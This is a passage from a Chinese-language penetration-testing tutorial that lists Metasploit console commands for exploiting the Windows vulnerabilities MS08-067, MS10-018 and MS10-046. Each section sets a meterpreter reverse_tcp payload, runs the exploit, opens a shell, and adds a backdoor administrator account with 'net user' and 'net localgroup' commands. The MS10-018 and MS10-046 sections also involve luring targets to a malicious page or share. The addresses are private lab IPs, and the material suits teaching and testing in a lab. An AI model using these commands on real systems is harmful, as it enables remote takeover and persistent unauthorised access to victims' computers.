# 可通过命令来查看详情:search ms08_067 use exploit/windows/smb/ms08_067_netapi //使用exploit set payload windows/meterpreter/reverse_tcp //设置攻击载荷 show options //查看参数配置 set RHOST 192.168.12.131 //设置目标主机ip ,我这里的目标主机为192.168.12.131 set LHOST 192.168.12.130 //设置本机ip ,我这里的本主机为192.168.12.130 set target 0 //这个设置自动 run //开始攻击 # 获取到反弹的shell shell //进入对方电脑的终端
2、漏洞 ms10_018(浏览器提权)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# 同样的我们看看这个漏洞(搜索):search ms10_018 use exploit/windows/browser/ms10_018_ie_behaviors //使用exploit set payload windows/meterpreter/reverse_tcp //设置攻击载荷 show options //查看参数配置 set SRVHOST 192.168.12.130 //设置服务器主机ip ,我这里的目标主机为192.168.12.130 set LHOST 192.168.12.130 //设置本机ip ,我这里的本主机为192.168.12.130 set URIPATH test //这个设置项目名为test exploit //开始渗透 # 等待目标访问我们的网页,或者引诱目标访问我们的网页 # 获取到session(当出现类似: Successfully migrated to services.exe (680) 这样就是成功了) sessions -i //查看 session session -i 1 //选择id ,1就是id # 获得shell # 可以在对方的系统上添加一个管理员权限:命令如下 net user admin admin123 /add //这条命令的意思是新建一个用户admin,密码为admin123 net localgroup administrators admin /add //这条命令的意思是吧admin 添加到管理员组
3、漏洞 ms10_046(快捷方式漏洞)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# 同样的我们看看这个漏洞(搜索):search ms10_046 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //使用exploit set payload windows/meterpreter/reverse_tcp //设置攻击载荷 show options //查看参数配置 set SRVHOST 192.168.12.130 //设置服务器主机ip ,我这里的目标主机为192.168.12.130 set LHOST 192.168.12.130 //设置本机ip ,我这里的本主机为192.168.12.130 run //开始渗透 exploit # 等待目标访问我们的网页,或者引诱目标访问我们的网页(或者http://192.168.12.130:80/) 或者文件夹里访问:\\192.168.12.130\ILSSNnFb\ # 获取到session(当出现类似: Successfully migrated to services.exe (680) 这样就是成功了) sessions -l //查看 session session -i 1 //选择id ,1就是id # 获得shell # 可以在对方的系统上添加一个管理员权限:命令如下 net user admin admin123 /add //这条命令的意思是新建一个用户admin,密码为admin123 net localgroup administrators admin /add //这条命令的意思是吧admin 添加到管理员组